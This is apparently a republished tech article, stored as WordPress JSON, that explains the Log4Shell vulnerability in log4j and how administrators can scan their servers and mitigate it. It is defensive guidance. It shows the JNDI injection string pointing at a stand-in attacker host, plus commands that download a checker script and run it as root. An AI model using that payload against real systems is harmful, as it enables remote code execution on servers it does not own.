{"id":382667,"date":"2021-12-18T03:02:54","date_gmt":"2021-12-18T00:02:54","guid":{"rendered":"https:\/\/en.buradabiliyorum.com\/how-to-check-if-your-server-is-vulnerable-to-the-log4j-java-exploit-log4shell-cloudsavvy-it\/"},"modified":"2021-12-18T03:02:54","modified_gmt":"2021-12-18T00:02:54","slug":"how-to-check-if-your-server-is-vulnerable-to-the-log4j-java-exploit-log4shell-cloudsavvy-it","status":"publish","type":"post","link":"https:\/\/buradabiliyorum.com\/en\/how-to-check-if-your-server-is-vulnerable-to-the-log4j-java-exploit-log4shell-cloudsavvy-it\/","title":{"rendered":"#How to Check If Your Server Is Vulnerable to the log4j Java Exploit (Log4Shell) \u2013 CloudSavvy IT"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_84 counter-hierarchy ez-toc-counter ez-toc-custom ez-toc-container-direction\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">Table of Contents<\/p>\n<label for=\"ez-toc-cssicon-toggle-item-6a289bf7e42a1\" class=\"ez-toc-cssicon-toggle-label\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #dd3333;color:#dd3333\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #dd3333;color:#dd3333\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/label><input type=\"checkbox\"  id=\"ez-toc-cssicon-toggle-item-6a289bf7e42a1\" checked aria-label=\"Toggle\" \/><nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/buradabiliyorum.com\/en\/how-to-check-if-your-server-is-vulnerable-to-the-log4j-java-exploit-log4shell-cloudsavvy-it\/#How_Does_This_Exploit_Work\" >How Does This Exploit Work?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/buradabiliyorum.com\/en\/how-to-check-if-your-server-is-vulnerable-to-the-log4j-java-exploit-log4shell-cloudsavvy-it\/#Am_I_Vulnerable\" >Am I Vulnerable?<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"https:\/\/buradabiliyorum.com\/en\/how-to-check-if-your-server-is-vulnerable-to-the-log4j-java-exploit-log4shell-cloudsavvy-it\/#Scanning_Your_System\" >Scanning Your System<\/a><\/li><\/ul><\/nav><\/div>\n<p><strong>&#8220;#How to Check If Your Server Is Vulnerable to the log4j Java Exploit (Log4Shell) \u2013 CloudSavvy IT&#8221;<\/strong><\/p>\n<div id=\"article-content-area\">\n<img loading=\"lazy\" decoding=\"async\" class=\"type:primaryImage alignnone size-full wp-image-15045\" data-pagespeed-lazy-srcset=\"https:\/\/www.cloudsavvyit.com\/p\/uploads\/2021\/12\/ebdb98ee.png?width=398&amp;trim=1,1&amp;bg-color=000&amp;pad=1,1 400w, https:\/\/www.cloudsavvyit.com\/p\/uploads\/2021\/12\/ebdb98ee.png?width=1198&amp;trim=1,1&amp;bg-color=000&amp;pad=1,1 1200w\" sizes=\"auto, 400w, 1200w\" data-pagespeed-lazy-src=\"https:\/\/www.cloudsavvyit.com\/p\/uploads\/2021\/12\/ebdb98ee.png?width=1198&amp;trim=1,1&amp;bg-color=000&amp;pad=1,1\" alt=\"\" width=\"675\" height=\"350\" src=\"\/pagespeed_static\/1.JiBnMqyl6S.gif\" onload=\"pagespeed.lazyLoadImages.loadIfVisibleAndMaybeBeacon(this);\" onerror=\"this.onerror=null;pagespeed.lazyLoadImages.loadIfVisibleAndMaybeBeacon(this);\"\/><\/p>\n<p>A critical exploit in widespread Java library has been found, disrupting much of the internet as server admins scramble to fix it. The vulnerable component, <code>log4j<\/code>, is used everywhere as an included library, so you will need to check your servers and make sure they\u2019re updated.<\/p>\n<h2 role=\"heading\" aria-level=\"2\"><span class=\"ez-toc-section\" id=\"How_Does_This_Exploit_Work\"><\/span>How Does This Exploit Work?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>As far as exploits go, the\u00a0<code>log4j<\/code>\u00a0 ulnerability is by far one of the worst in the last few years, scoring a rare 10\/10 on the CVSS scale, and is going to haunt the entire internet for many years to come.<\/p>\n<p>What\u2019s worse is that <code>log4j<\/code>\u00a0isn\u2019t an <a href=\"https:\/\/buradabiliyorum.com\/en\/category\/download-scripts-themes-apps\/\" data-internallinksmanager029f6b8e52c=\"9\" title=\"Download Scripts &amp; Themes &amp; Apps\" target=\"_blank\" rel=\"noopener\">app<\/a>lication\u2014it\u2019s an open source library used by many other applications. You may not have it installed directly; it might be included in other <code>.jar<\/code>\u00a0files, or installed by other applications as a dependency.<\/p>\n<p>Essentially, it allows attackers to send text to your application, and if it logs it somewhere (eg., logging a user controlled agent string in a web server), you server will execute malicious code. The format of the text looks like the following example: an extremely simple string containing a link to a remote address.<\/p>\n<pre>${jndi:ldap:\/\/attacker.com\/a}<\/pre>\n<p>The vulnerable component in <code>log4j<\/code>\u00a0is the\u00a0<a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/www.blackhat.com\/docs\/us-16\/materials\/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf\">Java Naming and Directory Interface<\/a>, which allows the logging framework to make remote requests. Except it also deserializes the file at that endpoint, and is able to load <code>.class<\/code>\u00a0files containing remote code. Which is bad.<\/p>\n<h2 role=\"heading\" aria-level=\"2\"><span class=\"ez-toc-section\" id=\"Am_I_Vulnerable\"><\/span>Am I Vulnerable?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>The exploit was quickly patched in <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/github.com\/apache\/logging-log4j2\/releases\/tag\/log4j-2.15.0-rc2\"><code>log4j<\/code>\u2018s latest release, 2.16.0<\/a>, but the problem isn\u2019t fixing it\u2014it\u2019s finding out where you need to. Since <code>log4j<\/code>\u00a0is an embedded dependency, it may be non-trivial to search for the specific version of it on your system. And, since Java is so popular, many third-party tools and components may use it, so you may not even\u00a0<em>know<\/em> if you are running Java software on your machines.<\/p>\n<p><strong>Even if you think you aren\u2019t vulnerable, you probably still need to double check<\/strong>. This exploit affects so many systems that there is a solid chance you may be running <code>log4j<\/code>\u00a0or Java without realizing it.<\/p>\n<p>Luckily, JDK versions greater than\u00a0<code>6u211<\/code>,\u00a0<code>7u201<\/code>,\u00a0<code>8u191<\/code>, and\u00a0<code>11.0.1<\/code>\u00a0are not affected by the primary attack vector (using LDAP) that\u2019s being exploited the most right now. You still need to patch it regardless, since it can\u00a0easily be <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/www.veracode.com\/blog\/research\/exploiting-jndi-injections-java\">used with other attack vectors as well<\/a>. Also, just the simple act of making a request to an endpoint can reveal data about machines on your network, which isn\u2019t a good thing either.<\/p>\n<p>This exploit highlights why it is important to keep a Software Bill of Materials (SBOM), basically a list of all the software on your systems, where it comes from, and what it\u2019s made from. In the future, this knowledge can help you quickly patch against attacks like this.<\/p>\n<p>In the present, you are probably just concerned about getting your network patched. To do that, you\u2019ll need to scan your systems to find <code>log4j<\/code>\u00a0versions used by your software, and make a list of all the vulnerable components.<\/p>\n<h2 role=\"heading\" aria-level=\"2\"><span class=\"ez-toc-section\" id=\"Scanning_Your_System\"><\/span>Scanning Your System<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Many people have already made scripts to automatically scan systems for vulnerable installations, such as <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/github.com\/fullhunt\/log4j-scan\">this popular one written in Python<\/a>, and <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/www.lunasec.io\/docs\/blog\/log4j-zero-day-mitigation-guide\/\">this one from security firm LunaSec<\/a>. One of the easiest to use <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/github.com\/rubo77\/log4j_checker_beta\">is this simple bash script<\/a>, which can scan your packages and identify <code>log4j<\/code>\u00a0versions, and can also tell you if your system is even using Java in the first place. In most cases, you\u2019ll want to run multiple scans with different scripts, because it\u2019s not guaranteed that any one of these is going to be 100% effective at identifying every vulnerable system.<\/p>\n<p>You can download it and run it with a few commands. This needs to run as root to scan your whole system, so of course, be careful which scripts you run with root privileges off the internet. This too is arbitrary code execution.<\/p>\n<pre>wget https:\/\/raw.githubusercontent.com\/rubo77\/log4j_checker_beta\/main\/log4j_checker_beta.sh -q&#13;\n&#13;\nchmod +x log4j_checker_beta.sh&#13;\n&#13;\n<!--EndFragment -->sudo .\/log4j_checker_beta.sh<\/pre>\n<p>The results from this script highlight exactly what makes this\u00a0<code>log4j<\/code>\u00a0vulnerability so terrible\u2014running this on my personal server revealed that I was vulnerable to the exploit, days after the zero-day, despite thinking I did not have Java installed on this machine because I\u2019m not running any of my own Java software.<\/p>\n<p>Elasticsearch is running in the background on this machine, which is written in Java. I didn\u2019t have to install Java manually to install Elasticsearch; it includes a bundled version of\u00a0OpenJDK. It includes <code>log4j<\/code>\u00a0in this installation and is vulnerable to the exploit.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-15144\" data-pagespeed-lazy-src=\"https:\/\/www.cloudsavvyit.com\/p\/uploads\/2021\/12\/7f0c5672.png?trim=1,1&amp;bg-color=000&amp;pad=1,1\" alt=\"\" width=\"1047\" height=\"581\" src=\"\/pagespeed_static\/1.JiBnMqyl6S.gif\" onload=\"pagespeed.lazyLoadImages.loadIfVisibleAndMaybeBeacon(this);\" onerror=\"this.onerror=null;pagespeed.lazyLoadImages.loadIfVisibleAndMaybeBeacon(this);\"\/><\/p>\n<p>The fix, for Elasticsearch at least, is updating all packages and following their mitigation guides. This will likely be the case for whatever software you\u2019re running; you\u2019ll need to update <code>log4j<\/code>\u00a0directly, update the software bundling it, or hotfix it with whatever best practice mitigations other people are using.<\/p>\n<p>If you can\u2019t patch the jar for some reason, you can use this JVM flag to mitigate the issue, which simply tells <code>log4j<\/code> to never do any lookups when formatting messages. This isn\u2019t recommended though, and you should try to get <code>log4j<\/code>\u00a02.16.0 installed wherever you can to fix the problem entirely.<\/p>\n<pre>-Dlog4j2.formatMsgNoLookups=true<\/pre>\n<\/div>\n<blockquote><p><strong><span style=\"color: #ff6600;\">If you liked the article, do not forget to share it with your friends. Follow us on\u00a0<span style=\"color: #ff0000;\"><a style=\"color: #ff0000;\" href=\"https:\/\/news.google.com\/publications\/CAAqBwgKMLG0nwswvr63Aw\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Google News<\/a><\/span>\u00a0too, click on the star and choose us from your favorites.<\/span><\/strong><\/p><\/blockquote>\n<blockquote>\n<p style=\"text-align: center;\">For forums sites go to <span style=\"color: #ff9900;\"><a style=\"color: #ff9900;\" href=\"https:\/\/forum.buradabiliyorum.com\/\" target=\"_blank\" rel=\"noopener\">Forum.BuradaBiliyorum.Com<\/a><\/span><\/strong><\/p>\n<\/blockquote>\n<blockquote>\n<p style=\"text-align: center;\"><strong>If you want to read more like this article, you can visit our <span style=\"color: #ff9900;\"><a style=\"color: #ff9900;\" href=\"https:\/\/en.buradabiliyorum.com\/technology\/\" target=\"_blank\" rel=\"noopener\">Technology category.<\/a><\/span><\/strong><\/p>\n<\/blockquote>\n<p><span style=\"color: black;\"><a style=\"color: #ff9900;\" href=\"https:\/\/www.cloudsavvyit.com\/15139\/how-to-check-if-your-server-is-vulnerable-to-the-log4j-java-exploit-log4shell\/\" target=\"_blank\" rel=\"noopener\">Source<\/a><\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&#8220;#How to Check If Your Server Is Vulnerable to the log4j Java Exploit (Log4Shell) \u2013 CloudSavvy IT&#8221; A critical exploit in widespread Java library has been found, disrupting much of the internet as server admins scramble to fix it. The vulnerable component, log4j, is used everywhere as an included library, so you will need to&#8230;<\/p>\n","protected":false},"author":1,"featured_media":382668,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/www.cloudsavvyit.com\/p\/uploads\/2021\/12\/ebdb98ee.png","fifu_image_alt":"","footnotes":""},"categories":[18],"tags":[],"class_list":["post-382667","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-technology"],"_links":{"self":[{"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/posts\/382667","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/comments?post=382667"}],"version-history":[{"count":0,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/posts\/382667\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/media\/382668"}],"wp:attachment":[{"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/media?parent=382667"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/categories?post=382667"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/tags?post=382667"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}